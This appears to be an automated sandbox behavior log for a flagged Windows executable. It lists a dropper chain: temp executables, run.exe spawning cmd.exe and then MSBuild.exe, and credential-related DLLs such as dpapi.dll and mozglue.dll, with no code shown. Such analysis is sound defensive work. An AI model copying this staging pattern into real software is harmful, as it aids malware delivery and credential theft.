Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: sx8RE6LbG0.exe Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File read: C:\Users\user\Desktop\sx8RE6LbG0.exe
Source: unknown Process created: C:\Users\user\Desktop\sx8RE6LbG0.exe "C:\Users\user\Desktop\sx8RE6LbG0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 968
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2004
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 --field-trial-handle=1968,i,3321473652488425193,11369094571635147960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 --field-trial-handle=1968,i,3321473652488425193,11369094571635147960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: zipfldr.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: shdocvw.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winshfhc.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wdscore.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winshfhc.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: security.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: olepro32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: schedcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: idndl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: wshbth.dll Jump to behavior
